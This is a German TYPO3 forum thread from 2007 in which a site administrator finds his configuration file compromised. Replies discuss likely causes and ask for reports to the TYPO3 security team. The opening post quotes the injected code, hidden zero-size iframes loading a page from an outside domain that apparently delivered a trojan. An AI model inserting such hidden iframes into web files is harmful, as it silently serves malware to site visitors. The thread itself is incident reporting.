#1  
Alt 29.06.07, 07:15
Benutzerbild von josDesign
TYPO3 Forum Team
Administrator
 
Registriert seit: 24.07.06
Alter: 24
Beiträge: 1.871
josDesign eine Nachricht über Skype™ schicken
[Sicherheitslücke] Eindringling in der localconf.php

Hallo COmmunity!

Ich glaub mich trifft der Schlag...

Heute wollte ich mich auf einer der Kundenseiten einloggen im BE. Komm aber nicht mehr hin und ein Trojaner wurde geladen...

Daraufhin hab ich kurz in die localconf.php gesehen..

Code:
// Updated by TYPO3 Extension Manager 28-01-2007 18:45:42
?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Wie kommt der da rein?

Weiters kann ich mich nicht mehr einloggen im BE und im Installtool logge ich mich ein, und beim nächsten Klick auf einen Menüpunkt im Installtool hauts mich raus...

Konnte gerade im Inet darüber was finden, wobei hier aber das Joomla betroffen war.

Die Version ist 4.0


Hilfe, da hilft nur noch löschen und neuinstallieren, oder?
__________________
Bitte markiere Deinen Thread als Gelöst, wenn er es ist! Wie geht das? Hast Du ihn eventl. selbst gelöst? Dann lass uns an der Lösung teilhaben!
Das Anzeigen von Typoscript in Beiträgen steuern

Geändert von josDesign (29.06.07 um 09:09 Uhr) Grund: GELÖÖÖST!
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!Spurl this Post!Reddit! Diesen Post bei linksilo.de bookmarken!
Mit Zitat antworten
Sponsored Links
Unterstützen Sie das Forum und buchen Sie Ihren Webspace beim
T3N Testsieger, dem Webhoster der auch dieses Forum hostet!


  #2  
Alt 29.06.07, 07:27
Benutzerbild von just2b  
Registriert seit: 03.11.04
Alter: 26
Beiträge: 3.544

wohl macina_banners/ric_rotation installiert gewesen?
__________________
TYPO3 3.7./3.8.X/4.0.X/4.1.1
just2b.com | Google Maps | SmoothGallery | Das grösste werbefreie TYPO3 Forum typo3.net | Content-Management-Systeme mit TYPO3 & RedDot
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!Spurl this Post!Reddit! Diesen Post bei linksilo.de bookmarken!
Mit Zitat antworten
  #3  
Alt 29.06.07, 07:33
Benutzerbild von josDesign
TYPO3 Forum Team
Administrator
 
Registriert seit: 24.07.06
Alter: 24
Beiträge: 1.871
josDesign eine Nachricht über Skype™ schicken

Nein, noch gar nichts! Ein nacktes T3 in der Version 4.0. Welches noch in der Testphase war.
Keine zusätzliche Extension programmiert.

Hab jetzt alles vom Server gelöscht, da wir nicht viel Webspace haben dort.
__________________
Bitte markiere Deinen Thread als Gelöst, wenn er es ist! Wie geht das? Hast Du ihn eventl. selbst gelöst? Dann lass uns an der Lösung teilhaben!
Das Anzeigen von Typoscript in Beiträgen steuern
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!Spurl this Post!Reddit! Diesen Post bei linksilo.de bookmarken!
Mit Zitat antworten
  #4  
Alt 29.06.07, 08:52
Forum Stammgast
 
Registriert seit: 20.08.04
Ort: Scheßlitz
Alter: 38
Beiträge: 128
AFisch eine Nachricht über ICQ schicken

HI ho

Es kann auch das hier gewesen sein:
http://news.typo3.org/news/article/t...tion-in-typo3/

Evtl. auch gar nix von dem, sondern nur ein unsicherer Webserver und ein böser Nachbar.

Gruß AFisch
__________________
TYPO3 Hosting für sorglose Projekte - www.webhosting-franken.de
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!Spurl this Post!Reddit! Diesen Post bei linksilo.de bookmarken!
Mit Zitat antworten
  #5  
Alt 29.06.07, 08:55
Benutzerbild von josDesign
TYPO3 Forum Team
Administrator
 
Registriert seit: 24.07.06
Alter: 24
Beiträge: 1.871
josDesign eine Nachricht über Skype™ schicken

RRichtig!

Die Seite lieg noch auf den Servern von easyserver.at. Und Supporttechnisch gesehen unter dem Hund. Leider sind sie sehr billig und das passt dem Kunden recht gut. Hmm, vielen Dank!
__________________
Bitte markiere Deinen Thread als Gelöst, wenn er es ist! Wie geht das? Hast Du ihn eventl. selbst gelöst? Dann lass uns an der Lösung teilhaben!
Das Anzeigen von Typoscript in Beiträgen steuern
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!Spurl this Post!Reddit! Diesen Post bei linksilo.de bookmarken!
Mit Zitat antworten
  #6  
Alt 29.06.07, 09:26
Forum Newbie
 
Registriert seit: 19.08.04
Ort: Stuttgart
Alter: 51
Beiträge: 11
jweiland eine Nachricht über Skype™ schicken
Bitte Details an das TYPO3 Security Team weiterleiten

Wer von diesem "iFrame" Problem betroffen ist sollte sich an das TYPO3 Security Team wenden (http://typo3.org/teams/security/contact-us)

Interessant für uns sind in dem Zusammenhang folgende Informationen:

- verwendete TYPO3 Version
- Liste der installierten Extensions
- wird ggf. eine Software für die Verwaltung des Servers eingesetzt, wie cPanel, confixx, plesk o.ä.
- Apache Logfiles

Jochen Weiland
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!Spurl this Post!Reddit! Diesen Post bei linksilo.de bookmarken!
Mit Zitat antworten
  #7  
Alt 29.06.07, 09:32
Forum Zuschauer
 
Registriert seit: 29.06.07
Beiträge: 1
Ausrufezeichen Analyse

Hallo,
dezeit grassiert leider eine größere Welle solcher exploits. Dabei handelt es sich um *kein* TYPO3-spezifisches Problem. Auch viele andere systeme sind betroffen, es wurden scheinbar die verschiedensten Lücken ausgenutzt.

Das TYPO3 Security-team ist sehr an einer Aufklärung der vorgänge interessiert.

Wenn möglich bitten wir das Security-Team mit Detailangaben zu dem Hack zu informieren.
http://typo3.org/teams/security/contact-us/

In diesem Fall wäre es sicherlich lohnenswert:
a) die Version der rtehtmlarea-extension mitzuteilen
b) in den Apahce-Logs zu prüfen ob da unberechtigte Zugriffe auf eine der rtehtmlarea-dateien erfolgt sind (vgl. dazu: http://news.typo3.org/news/article/t...tion-in-typo3/)

Gruß,
Peter Niederlag
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!Spurl this Post!Reddit! Diesen Post bei linksilo.de bookmarken!
Mit Zitat antworten
  #8  
Alt 29.06.07, 09:32
Benutzerbild von josDesign
TYPO3 Forum Team
Administrator
 
Registriert seit: 24.07.06
Alter: 24
Beiträge: 1.871
josDesign eine Nachricht über Skype™ schicken

Hallo Jochen!

Wow, ich bekomme eine Antwort von einem zu den ich hochsehe!

Du Jochen, das ist jetzt blöd..

Die Version ist 4.0
Nur die inkludierten Extensions wie sie damals im Februar im Package dabei waren
Alles andere werde ich nie herausfinden können, da der WEbspace-Provider wo die Seite NOCH liegt (ab nächster Woche nicht mehr) keinen Support gibt. Und wenn dann nur, wenn man ein paar Wochen wartet. :sad: Sorry!



Offtopic: Eine andere Frage Jochen. Auf deiner WEbsite gabs das gute Tutorial zum Thema Mahrsprachigkeit. Wird dies gerade upgedatet, oder??? Es ist nicht mehr online, und ich würds gerne nochmal eine durchlesen... !!!


lieGRÜ
jos
__________________
Bitte markiere Deinen Thread als Gelöst, wenn er es ist! Wie geht das? Hast Du ihn eventl. selbst gelöst? Dann lass uns an der Lösung teilhaben!
Das Anzeigen von Typoscript in Beiträgen steuern
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!Spurl this Post!Reddit! Diesen Post bei linksilo.de bookmarken!
Mit Zitat antworten
  #9  
Alt 29.06.07, 09:33
Benutzerbild von mstuebner
TYPO3 Forum Team
Moderator
 
Registriert seit: 01.09.04
Ort: 84424 Isen b. Dorfen
Alter: 42
Beiträge: 2.482
mstuebner eine Nachricht über Skype™ schicken

Zitat:
Zitat von josDesign Beitrag anzeigen
RRichtig!
Richtig, WAS?
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!Spurl this Post!Reddit! Diesen Post bei linksilo.de bookmarken!
Mit Zitat antworten
  #10  
Alt 29.06.07, 09:45
Benutzerbild von josDesign
TYPO3 Forum Team
Administrator
 
Registriert seit: 24.07.06
Alter: 24
Beiträge: 1.871
josDesign eine Nachricht über Skype™ schicken

Zitat:
Zitat von mstuebner Beitrag anzeigen
Richtig, WAS?
Na das war der Fehler! Also, mir scheint dies als der einzig mögliche gewesen zu sein ;)
__________________
Bitte markiere Deinen Thread als Gelöst, wenn er es ist! Wie geht das? Hast Du ihn eventl. selbst gelöst? Dann lass uns an der Lösung teilhaben!
Das Anzeigen von Typoscript in Beiträgen steuern
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!Spurl this Post!Reddit! Diesen Post bei linksilo.de bookmarken!
Mit Zitat antworten
Antwort

Lesezeichen

Themen-Optionen
Ansicht Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


LinkBacks (?)
LinkBack to this Thread: http://www.typo3forum.net/forum/typo3-4-x-backend/21640-sicherheitsl-cke-eindringling-localconf-php.html
Erstellt von For Type Datum
mpack angriffe per iframe nun auch gegen TYPO3 This thread Refback 11.07.07 16:59

Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Sicherheitslücke in srfeuserregister ? TimS TYPO3 4.x FE-User 1 05.10.07 15:44
Neue Sicherheitslücke tom TYPO3 4.x Installation und Updates 0 22.02.07 08:15
Sicherheitslücke RTE ghoti TYPO3 4.x Rich Text Editor 3 21.12.06 12:27
Sicherheitslücke pinkpanther TYPO3 4.x Installation und Updates 2 08.06.06 19:04
Wichtig!: Sicherheitslücke im Forum! mavo Forum Bar 5 29.09.04 15:13


Alle Zeitangaben in WEZ +1. Es ist jetzt 17:09 Uhr.


Powered by vBulletin® Version 3.8.4 (Deutsch)
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.3.2

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165